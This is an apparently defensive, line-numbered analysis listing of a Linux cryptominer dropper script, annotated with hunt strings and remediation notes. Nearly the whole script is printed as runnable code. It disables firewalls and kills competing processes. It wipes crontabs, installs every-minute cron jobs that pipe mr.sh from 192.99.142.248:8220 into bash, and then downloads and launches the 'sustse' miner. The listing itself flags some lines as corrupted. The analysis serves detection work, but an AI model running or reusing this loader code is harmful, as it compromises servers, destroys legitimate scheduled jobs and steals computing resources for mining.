1 #!/bin/bash
# Analysis notes (defender view). The leading number on each line is a page
# gutter artifact from the listing, not part of the script.
# Stage 1 - host preparation. Everything here needs root to succeed, so
# successful execution of these lines implies the script ran privileged.
2 mkdir /var/tmp
# Clear the immutable attribute on wget and curl and make them executable,
# so the download steps later in the script can use them.
3 chattr -i /usr/bin/wget
4 chmod 755 /usr/bin/wget
5 chattr -i /usr/bin/curl
6 chmod 755 /usr/bin/curl
# Stop the host firewall under each service name tried here. Detection: a
# firewall stop issued by a script rather than an administrator session.
7 /etc/init.d/iptables stop
8 service iptables stop
9 SuSEfirewall2 stop
10 reSuSEfirewall2 stop
# Kill processes whose command line matches these strings.
# NOTE(review): presumably rival malware on the same host - confirm against
# threat intel; the names are usable as hunt strings either way.
11 pkill -f sysxlj
12 pkill -f jourxlv
13 pkill -f sustes
# Creates /etc/ld.so.preload if absent (and bumps its mtime otherwise); the
# file is edited with sed later in the script. Any change to this file is a
# high-signal event for file-integrity monitoring.
14 touch /etc/ld.so.preload
# Stage 2 - removal of other software and of existing cron state.
# The netstat pipelines in this stage look up the PID/program column for
# connections to a listed address or port and pass it to kill -9.
# NOTE(review): the command text in this listing looks lossy - the sed
# expression `s//.*//g` is not valid as printed, and the `|` alternations sit
# in plain-grep patterns. Build detections on the stable strings (addresses,
# ports, file paths) rather than on exact command lines.
15 netstat -antp | grep '56415' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
16 netstat -antp | grep '139.99.120.75' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
# Delete named shared objects and a helper script.
# NOTE(review): presumably artifacts of other malware families - confirm.
17 rm -rf /usr/lib/void.so
18 rm -rf /etc/voidonce.sh
19 rm -rf /usr/local/lib/libjdk.so
20 rm -rf /usr/local/lib/libntp.so
# The match string is the base64 encoding of "#coding: utf-8", so this kills
# processes that carry base64-encoded Python source on their command line.
21 ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9
# Deletes the last line of /etc/crontab, whatever it is.
22 sed -i '$d' /etc/crontab
23 rm -rf /lib64/library1.so
24 rm -rf /usr/lib64/library1.so
# Inserts DROP rules into the running iptables ruleset: one address in both
# directions, and any outbound TCP/UDP packet containing "pastebin". These
# rules outlive the script; review the live ruleset during response.
25 iptables -I OUTPUT -s 167.99.166.61 -j DROP
26 iptables -I INPUT -s 167.99.166.61 -j DROP
27 iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP
28 iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP
29 rm -rf /etc/cron.monthly/oanacroner
30 rm -rf /etc/cron.daily/oanacroner
31 rm -rf /etc/cron.hourly/oanacroner
32 rm -rf /usr/local/bin/dns
# Overwrites system and root cron files with a single empty line. This also
# destroys legitimate scheduled jobs; recovery needs a known-good backup.
33 echo "" > /etc/crontab
34 echo "" > /etc/cron.d/root
35 echo "" > /etc/cron.d/apache
36 echo "" > /var/spool/cron/root
37 echo "" > /var/spool/cron/crontabs/root
# Unregisters and kills a service named netdns, then removes its files.
38 chkconfig --del netdns
39 pkill -f netdns
40 echo "" > /etc/cron.d/system
# Mode 777 on /var/tmp. NOTE(review): on typical systems /var/tmp is 1777;
# a numeric 777 drops the sticky bit, which lets any local user delete other
# users' files there. Restore 1777 during cleanup.
41 chmod 777 /var/tmp
42 rm -rf /usr/local/bin/dns
43 rm -rf /usr/sbin/netdns
44 rm -rf /etc/init.d/netdns
45 rm -rf /etc/cron.monthly/oanacroner
46 rm -rf /etc/cron.daily/oanacroner
47 rm -rf /etc/cron.hourly/oanacroner
# Removes libntpd.so and its entry in /etc/ld.so.preload, then strips lines
# mentioning pastebin.com from the invoking user's crontab.
48 chattr -i /usr/local/lib/libntpd.so
49 chmod 777 /usr/local/lib/libntpd.so
50 rm -rf /usr/local/lib/libntpd.so
51 sed -i '/libntpd.so/d' /etc/ld.so.preload
52 crontab -l | sed '/pastebin.com/d' | crontab -
# More connection-based kills, one group per remote address list and
# TCP state (same pipeline shape and same caveat as lines 15-16).
53 netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
54 netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
55 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
56 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
57 netstat -antp | grep '104.160.171.94|170.178.178.57|91.236.182.1|52.15.72.79|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
58 netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
59 netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
60 netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
61 netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
# A dot-prefixed "sshd" under /usr/bin is not the system SSH daemon path;
# useful as a hunt string for a hidden binary.
62 pkill -f /usr/bin/.sshd
63 netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9
# Pattern-based deletes in /tmp and /var/tmp. The globs (j*, java*) are
# broad enough to remove unrelated files, so missing temp files on an
# affected host are not by themselves evidence of another infection.
64 rm -rf /var/tmp/j*
65 rm -rf /tmp/j*
66 rm -rf /var/tmp/java
67 rm -rf /tmp/java
68 rm -rf /var/tmp/java2
69 rm -rf /tmp/java2
70 rm -rf /var/tmp/java*
71 rm -rf /tmp/java*
# Each file is removed only if clearing its immutable attribute succeeded.
72 chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
73 chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
74 rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
75 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
76 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
77 rm -rf /tmp/*index_bak*
78 rm -rf /tmp/*httpd.conf*
79 rm -rf /tmp/*httpd.conf
80 rm -rf /tmp/a7b104c270
81 rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
82 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
# Kills whatever process is bound to or connected on port 13531.
83 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
# Stage 3 - cron persistence. Each echo below spans two physical lines (the
# string contains a newline followed by "##") and overwrites one cron file
# with a job that fetches mr.sh from 192.99.142.248:8220 over plain HTTP and
# pipes it to bash. Intervals as written: every 1 min (/etc/cron.d/root),
# 2 min (/etc/cron.d/apache), 30 min (/var/spool/cron/root) and every minute
# (/var/spool/cron/crontabs/root). Detection: any cron entry that pipes a
# curl/wget download into a shell; remediation must clear all four files.
84 echo -e "*/1 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /etc/cron.d/root
85 echo -e "*/2 * * * * root (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /etc/cron.d/apache
86 echo -e "*/30 * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /var/spool/cron/root
87 mkdir -p /var/spool/cron/crontabs
88 echo -e "* * * * * (curl -s http://192.99.142.248:8220/mr.sh||wget -q -O - http://192.99.142.248:8220/mr.sh)|bash -sh
##" > /var/spool/cron/crontabs/root
89 mkdir -p /etc/cron.hourly
# Drops a fifth persistence file, /etc/cron.hourly/oanacroner1, fetched from
# the same host, and marks it executable only if the fetch group succeeded.
# NOTE(review): as printed, the alternative after `||` starts with a URL and
# has no command name, so the listing is likely incomplete here.
90 (curl -fsSL --connect-timeout 120 http://192.99.142.248:8220/11 -o /etc/cron.hourly/oanacroner1||http://192.99.142.248:8220/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
# World-writable, world-executable mode on the payload path.
91 chmod 777 /var/tmp/sustse
# Stage 4 - free CPU, then run secondary loaders if no connection is up.
# Sends SIGKILL to every process in `ps aux` whose %CPU column is above 30,
# after a grep that is meant to exclude the script's own process names.
# Operational symptom: busy legitimate services dying with SIGKILL.
92 ps aux | grep -vw 'kworkerds|sustse' | awk '{if($3>30.0) print $2}' | while read procid
93 do
94 kill -9 $procid
95 done
# Kills processes with /tmp/ in their command line, and processes that
# reference the listed *.conf names, again minus the excluded names.
96 ps ax | grep /tmp/ | grep -v grep | grep -v 'kworkerds|sustse|kworkerds|sustse|ppl' | awk '{print $1}' | xargs kill -9
97 ps ax | grep 'wc.conf|wq.conf|wm.conf' | grep -v grep | grep -v 'kworkerds|sustse|kworkerds|sustse|ppl' | awk '{print $1}' | xargs kill -9
# Looks for an ESTABLISHED connection to one of three endpoints.
# NOTE(review): presumably the operator's pool/proxy endpoints - confirm.
# $? below is the exit status of the final grep in this pipeline.
98 netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep
99 if [ $? -eq 0 ]
100 then
# Connection found: do nothing useful (pwd is a no-op placeholder).
101 pwd
102 else
# No connection found: fetch 2mr.sh over plain HTTP and execute it directly.
103 curl http://192.99.142.248:8220/2mr.sh | bash -sh
104 fi
105 sleep 2
# Same check repeated after two seconds, with 3mr.sh as the fallback script.
106 netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep
107 if [ $? -eq 0 ]
108 then
109 pwd
110 else
111 curl http://192.99.142.248:8220/3mr.sh | bash -sh
112 fi
# Stage 5 - choose the staging directory (DIR) and the download command.
# DIR defaults to /var/tmp; the payload file name used throughout is sustse.
113 DIR="/var/tmp"
114 if [ -a "/var/tmp/sustse" ]
115 then
# Payload path exists: usable only if it is writable and not a directory.
116 if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ]
117 then
118 if [ -x "$(command -v md5sum)" ]
119 then
# Self-integrity check: the MD5 of the existing file is compared against one
# expected value (listed twice in the pattern). That value is usable as a
# file-hash indicator for the payload version this listing refers to.
120 sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }')
121 echo $sum
122 case $sum in
123 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
124 echo "sustse OK"
125 ;;
126 *)
# Hash mismatch: stop any running copy so the file can be replaced later.
127 echo "sustse wrong"
128 pkill -f wc.conf
129 pkill -f sustse
130 sleep 4
131 ;;
132 esac
133 fi
134 echo "P OK"
135 else
# Path is unusable: switch DIR to a var/tmp path under a fresh `mktemp -d`
# directory. Hunting note: staging is therefore not limited to /var/tmp and
# can sit under a randomly named temp directory.
136 DIR=$(mktemp -d)/var/tmp
137 mkdir $DIR
138 echo "T DIR $DIR"
139 fi
140 else
141 if [ -d "/var/tmp" ]
142 then
143 DIR="/var/tmp"
144 fi
145 echo "P NOT EXISTS"
146 fi
# If the payload path is a directory, fall back to a mktemp-based DIR as well.
147 if [ -d "/var/tmp/sustse" ]
148 then
149 DIR=$(mktemp -d)/var/tmp
150 mkdir $DIR
151 echo "T DIR $DIR"
152 fi
# Download command selection. The wget check runs last, so wget is used when
# both tools are present and curl only when wget is missing or empty.
153 WGET="wget -O"
154 if [ -s /usr/bin/curl ];
155 then
156 WGET="curl -o";
157 fi
158 if [ -s /usr/bin/wget ];
159 then
160 WGET="wget -O";
161 fi
# Payload/config host and port, used later as http://$f2/... (plain HTTP).
162 f2="192.99.142.248:8220"
163
# downloadIfNeed: make sure $DIR/sustse exists and has the expected MD5.
# Globals: DIR (read), WGET (rewritten on hash mismatch), sum, sizeBefore,
#          sumAfter (written; none are declared local).
# Calls:   download (defined elsewhere in this file).
# Outputs: status text on stdout; on mismatch, when curl is present, one log
#          line to $DIR/var/tmp.txt (a possible on-disk artifact).
164 downloadIfNeed()
165 {
166 if [ -x "$(command -v md5sum)" ]
167 then
168 if [ ! -f $DIR/sustse ]; then
169 echo "File not found!"
170 download
171 fi
172 sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
173 echo $sum
174 case $sum in
175 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
176 echo "sustse OK"
177 ;;
178 *)
179 echo "sustse wrong"
180 sizeBefore=$(du $DIR/sustse)
# On mismatch the download command is switched to variants that disable TLS
# certificate verification (curl -k / wget --no-check-certificate).
181 if [ -s /usr/bin/curl ];
182 then
183 WGET="curl -k -o ";
184 fi
185 if [ -s /usr/bin/wget ];
186 then
187 WGET="wget --no-check-certificate -O ";
188 fi
# Disabled alternative source left in by the author; the URL is still a
# usable hunt string in proxy logs.
189 #$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse
190 download
191 sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }')
192 if [ -s /usr/bin/curl ];
193 then
194 echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt
195 fi
196 ;;
197 esac
198 else
# Without md5sum there is no integrity check at all: always re-download.
199 echo "No md5sum"
200 download
201 fi
202 }
203
# download: restore the payload from a cached copy, else fetch it.
# $DIR/sustse3 acts as a local cache: if its MD5 matches the expected value
# it is copied over $DIR/sustse; otherwise (or with no md5sum) download2 is
# called. Cleanup note: both sustse and sustse3 must be removed, or the
# cached copy is used to restore the payload without any network traffic.
204 download() {
205 if [ -x "$(command -v md5sum)" ]
206 then
207 sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }')
208 echo $sum
209 case $sum in
210 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
211 echo "sustse OK"
212 cp $DIR/sustse3 $DIR/sustse
213 ;;
214 *)
215 echo "sustse wrong"
216 download2
217 ;;
218 esac
219 else
220 echo "No md5sum"
221 download2
222 fi
223 }
224
# download2: fetch the payload from the network and refresh the cache.
# Globals: WGET, DIR (read); sum (written).
# Network indicator: HTTP GET for /tte2 on 192.99.142.248:8220.
225 download2() {
# The fetch happens only when getconf reports a 64-bit word size; no
# download is attempted in this function on other hosts.
226 if [ `getconf LONG_BIT` = "64" ]
227 then
228 $WGET $DIR/sustse http://192.99.142.248:8220/tte2
229 fi
230
231 if [ -x "$(command -v md5sum)" ]
232 then
233 sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
234 echo $sum
235 case $sum in
236 042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
237 echo "sustse OK"
# A verified download is copied to sustse3, the cache that download() reads.
238 cp $DIR/sustse $DIR/sustse3
239 ;;
240 *)
# A mismatch is only reported; the file is left in place.
241 echo "sustse wrong"
242 ;;
243 esac
244 else
245 echo "No md5sum"
246 fi
247 }
248
# judge: start the payload unless a connection to one of the three listed
# endpoints is already ESTABLISHED (in which case it prints "Running").
# Globals: DIR, WGET, f2 (read). Calls downloadIfNeed.
# Host artifacts: /var/tmp/123 (marker file), $DIR/wc.conf (config fetched
# from http://$f2/wt.conf), and a nohup'd `sustse -c .../wc.conf` process
# with stdout/stderr discarded - the process command line is the most
# reliable thing to alert on.
249 judge() {
250 if [ ! "$(netstat -ant|grep '158.69.133.18:80|192.99.142.249:3333|202.144.193.110:3333'|grep 'ESTABLISHED'|grep -v grep)" ];
251 then
# SIGKILL every process at or above 30% CPU before launching.
252 ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
253 do
254 kill -9 $procid
255 done
256 downloadIfNeed
257 touch /var/tmp/123
258 pkill -f /var/tmp/java
259 pkill -f w.conf
260 chmod +x $DIR/sustse
261 $WGET $DIR/wc.conf http://$f2/wt.conf
262 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
263 sleep 5
264 else
265 echo "Running"
266 fi
267 }
268
# judge2: process-based variant of judge. It starts the payload when `ps -fe`
# shows no process matching both "sustse" and "wc.conf"; it does not kill
# high-CPU processes and does not look at network connections.
# Globals: DIR, WGET, f2 (read). Calls downloadIfNeed.
269 judge2() {
270 if [ ! "$(ps -fe|grep 'sustse'|grep 'wc.conf'|grep -v grep)" ];
271 then
272 downloadIfNeed
273 chmod +x $DIR/sustse
# Config is re-fetched over plain HTTP on every start.
274 $WGET $DIR/wc.conf http://$f2/wt.conf
275 nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
276 sleep 5
277 else
278 echo "Running"
279 fi
280 }
281
# Stage 6 - launch, user-crontab persistence, final cleanup.
# If netstat output has no line matching the state pattern, use the
# process-based check (judge2); otherwise use the connection-based one.
282 if [ ! "$(netstat -ant|grep 'LISTEN|ESTABLISHED|TIME_WAIT'|grep -v grep)" ];
283 then
284 judge2
285 else
286 judge
287 fi
288
# User-crontab persistence, in addition to the system cron files written
# earlier. If the invoking user's crontab does not already reference the
# payload host, the whole crontab is removed (crontab -r) and replaced by an
# every-minute job that pipes mr.sh into bash with output discarded.
# Remediation: check `crontab -l` for every account the script could have
# run as, not only the files under /etc/cron.d and /var/spool/cron.
289 if crontab -l | grep -q "192.99.142.248:8220"
290 then
291 echo "Cron exists"
292 else
293 crontab -r
294 echo "Cron not found"
# Loader command for the cron line; as with WGET, the wget check runs last
# and so takes precedence when both tools exist.
295 LDR="wget -q -O -"
296 if [ -s /usr/bin/curl ];
297 then
298 LDR="curl";
299 fi
300 if [ -s /usr/bin/wget ];
301 then
302 LDR="wget -q -O -";
303 fi
304 (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
305 fi
306 rm -rf /var/tmp/jrm
307 rm -rf /tmp/jrm
# Kills processes whose command line contains these addresses and strips
# crontab lines mentioning 185.222.210.59.
# NOTE(review): presumably other loaders' infrastructure - confirm.
308 pkill -f 185.222.210.59
309 pkill -f 95.142.40.81
310 pkill -f 158.69.133.18
311 chmod 777 /var/tmp/sustse
312 crontab -l | sed '/185.222.210.59/d' | crontab -